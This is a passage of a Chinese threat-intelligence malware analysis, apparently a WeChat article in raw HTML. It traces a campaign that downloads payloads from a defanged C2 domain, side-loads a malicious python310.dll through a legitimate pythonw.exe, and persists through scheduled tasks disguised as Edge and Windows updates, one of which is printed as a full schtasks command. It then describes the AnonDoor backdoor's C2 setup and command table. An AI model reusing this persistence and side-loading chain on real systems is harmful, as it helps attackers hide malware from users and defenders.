24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">下载https[:]//nexnxky[.]info/TO96v.Wst到C:\Windows\Tasks\pythonw.exe。pythonw.exe是一个合法的Python解释器，但在此时被用作“白文件”。通过A4=1,设置名为WinUpdate的计划任务，延迟1分钟后执行,并伪装成Windows更新以降低管理员警惕。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">第二步：部署恶意DLL（Task B）</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">下载https[:]//nexnxky[.]info/Ytu7Y.Rut到C:\Windows\Tasks\python310.dll。python310.dll是一个攻击者自己开发的恶意的DLL文件。通过DLL侧加载，当第一步中的pythonw.exe启动时，它会优先加载同目录下的python310.dll。攻击者将恶意代码写入这个DLL中，利用合法的Python进程执行恶意代码，从而绕过部分杀软对非白名单进程的查杀。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">第三步：释放诱饵文档（Task A）</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">下载https[:]//nexnxky[.]info/P7DuR.Dtt到C:\Windows\Tasks\decmeMett.pdf，decmeMett.pdf是一个诱饵PDF文件，设置名为SysCheck的计划任务并立即运行。让用户误以为自己只是打开了一个普通文件，掩盖后台正在进行的恶意行为。</span></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.2）</span><span leaf="">二阶恶意载荷分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">二阶恶意载荷（python310.dll）入口位于Py_Main导出函数，pythonw.exe会默认加载该导出函数，二阶载荷首先会从三阶样本下载服务器nexnxky.info拉取名为RTRP4.tmps的三阶载荷保存到本地。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024162" data-ratio="0.6494708994708994" data-w="756" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=44f53db1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIxnTDfBF5a66ou4aUhoNFkia5rN9UsPFLdbiaTiaaCophrxmmSPqq6yHqW3HGCbSYU6GBHcOSDMWaE9NB4nvJ6BiaWVRMZxSwdelQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">下载的三阶载荷部分内容如下：</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5156069364161849" data-type="png" data-w="865" data-imgfileid="100024163" src="https://wechat2rss.xlab.app/img-proxy/?k=e5e3aeb4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJ5vcHafjvAy5WEnK9k6FicibudIFMw43Uw2Tia42RXl0oSXyXuiaYbBnElDntvxicyV5wG2kw3LU7tsCAJFMhEvUPsZBMgOrIQzLJs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">需要特别说明的是，下载的三阶载荷其数据遵循如下格式，累计有2471个文件的base64数据，导致数据文件特别大，并且也干扰了分析者辨别真正恶意的base64文件数据。</span></span></p><table><tbody><tr><td data-colwidth="576"><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">	Filename</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">	Base64(filedata)</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">	===END===</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">	Filename</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">	Base64(filedata)</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">	===END===</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">	***</span></span></p></td></tr></tbody></table><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">随后二阶载荷开始处理部署三阶载荷，通过两个嵌套循环遍历提取三阶载荷中的所有数据，以便提取文件名、base64解码文件等功能。下图是提取数据的逻辑。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024164" data-ratio="0.7408088235294118" data-w="544" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=2333ffbf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJfFnE9nTodOBwgRMYHbQDNboibrPM6UdfEibRia3TzGdVBP8F346oIDAc0rlYnFnI7wfaSjm0KIibt0SHb5YCfTOYYv1VTBdFOmI0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.0519125683060109" data-type="png" data-w="732" data-imgfileid="100024165" src="https://wechat2rss.xlab.app/img-proxy/?k=00a1bc01&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLkOsSV4qRnpsicYCsibKddTkn9d65rG0saQtSXPEwEvHCBhRmJ76LX09oXBtb3opLU73q0voLevy7chj26W7W0KjKmiaW0GxIdOs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">将三阶载荷提取部署完成后，通过创建计划任务的方式启动三阶载荷从而达到持久化和启动三阶载荷的目的。</span></span></p><table><tbody><tr><td data-colwidth="576"><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">schtasks.exe /Create /F /SC MINUTE /MO 5 /TN &#34;MicrosoftEdgeUpdat</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">e2Network&#34; /TR &#34;\&#34;C:\Users\[用户名]\AppData\Local\PythonVersion3\p</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">ythonw.exe\&#34; \&#34;C:\Users\[用户名]\AppData\Local\PythonVersion3\pyth</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">on2_pycache_.dll\&#34;&#34;</span></span></p></td></tr></tbody></table><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024166" data-ratio="0.42922899884925203" data-w="869" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=8a40bd07&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKCR3fZ4MiapsVAcwOYaPibsuTTgPzZg3SV6aYFG02hoodDx6ticCZDWTrW52Bcvj2TXoxYCL7KlsZYOB5W1sMbKmibibzy04gg1WJc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">3. </span><span leaf="">恶意组件AnonDoor分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">经过二阶恶意dll处理后的三阶载荷共2471个文件，其中除python2_pycache_.dll文件外其余文件均为合法正常文件，且python2_pycache_.dll是伪造DLL文件，该文件其实为pyc文件，经分析该组件类型是基于Python的AnonDoor组件。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024167" data-ratio="0.36182336182336183" data-w="702" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=45275995&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIWsU2fCZ3Zib4YGeJgofM4oxJ2yIswia7qSazbK0Eu9mphxzcaFBl3AMXl2g6ILZAj54PnyYNOottmjauN823jfHIpHvM1cIOlI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.4908424908424909" data-type="png" data-w="273" data-imgfileid="100024168" src="https://wechat2rss.xlab.app/img-proxy/?k=655b1027&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXId6WOusHN0KvKCvoicysjBRTmMBcSicZ0wicdxbTBibuGv4f3kib0NDkHxVDbicicKVoFGJWgWDc8ZW591JHk2xm6hrPvp912Q6I9PhM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">3.1）</span><span leaf="">AnonDoor核心功能概述</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">由于python2_pycache_.dll基于Python 3.13版本编译，目前市面尚无成熟的反编译工具支持。为此，我们通过自研增强型反汇编工具尝试对代码进行还原。受限于该方式的技术局限性，反编译代码可能存在逻辑偏差，以下分析结果仅供参考。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">AnonDoor首先会检测系统平台是否为nt,随后创建互斥体“Global\MyUniqueMutexName”从而保持单实例运行。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024169" data-ratio="0.20115606936416186" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=abe89e34&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKmZR34ZVasEM54wwMEtGzrFnSNOH4qK3FrkN1VLoMMUTxiaFMBtHcaiafiaeVxyt8DKJwzbJB1cHSQx7kjPzE4PFWng5ZzUtosrk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">入口检测通过后，开始初始化C2和URL路径，分析版本的AnonDoor包括了两个C2地址nexnxky[</span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">.</span></span><span leaf="">]info、upxvion[</span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">.</span></span><span leaf="">]info，如下图所示。同时由配置设置使用443还是80端口，同时网络请求的User-Agent被硬编码为 Mozilla/5.0 (Windows NT 10.0; Win64; x64)，试图混淆为正常的Windows浏览器流量。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024170" data-ratio="0.665374677002584" data-w="774" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=b3d10048&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLTdWSib1C85Hq2d9TgVfsgFUSbRtnKvOMDedLDWDrSBqXlF3joiaAhib9AQV6Pq0fO2Ribhb2AibwiaCn6ZVMLeXMaGfIgGJgn4cbP8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">完成C2初始化后，AnonDoor会首先向C2获取后续的插件模块加载运行，当初始模块加载完成后通过心跳保持与C2的长连接及解析服务端下发的指令。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">后续的各功能模块会通过模块下发的方式完成，同时根据代码结构来看，下发的模块（pyc）后缀为.dll,攻击者可根据目标归属灵活加载各类型功能模块。代码功能函数如下所示。</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9471428571428572" data-type="png" data-w="700" data-imgfileid="100024171" src="https://wechat2rss.xlab.app/img-proxy/?k=6bfcb9fa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLbYT3598fZDmst7Jx7KuRJa9N0XwYYCaO2B2M3B5IZ1PqnlPDrXDNALPkN8sKAAr8V3iatF1YgXlHMjRoQYBrqpVIVPZsnsTbg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">目前AnonDoor组件支持不限于以下功能：</span></span></p><table style="width:577px;"><tbody><tr><td data-colwidth="141"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-weight: bold;">函数名</span></span></p></td><td data-colwidth="162"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-weight: bold;">对应指令代码</span></span></p></td><td data-colwidth="274"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-weight: bold;">核心功能分析</span></span></p></td></tr><tr><td data-colwidth="141"><p><span leaf=""><span textstyle="" style="font-size: 15px;">hjjkhfdj_BBB1</span></span></p></td><td data-colwidth="162"><p><span leaf=""><span textstyle="" style="font-size: 15px;">jjkkj9874bn</span></span></p></td><td data-colwidth="274"><p><span leaf=""><span textstyle="" style="font-size: 15px;">用于维持基础控制权的模块。</span></span></p></td></tr><tr><td data-colwidth="141"><p><span leaf=""><span textstyle="" style="font-size: 15px;">hjjkhfdj_CM2M</span></span></p></td><td data-colwidth="162"><p><span leaf=""><span textstyle="" style="font-size: 15px;">yugrhj7juj</span></span></p></td><td data-colwidth="274"><p><span leaf=""><span textstyle="" style="font-size: 15px;">通用命令模块 (Command)。用于执行常规的系统 shell 命令或脚本。</span></span></p></td></tr><tr><td data-colwidth="141"><p><span leaf=""><span textstyle="" style="font-size: 15px;">hjjkhfdj_SC2M</span></span></p></td><td data-colwidth="162"><p><span leaf=""><span textstyle="" style="font-size: 15px;">ghd54gbgfhwe</span></span></p></td><td data-colwidth="274"><p><span leaf=""><span textstyle="" style="font-size: 15px;">截图</span></span></p></td></tr><tr><td data-colwidth="141"><p><span leaf=""><span textstyle="" style="font-size: 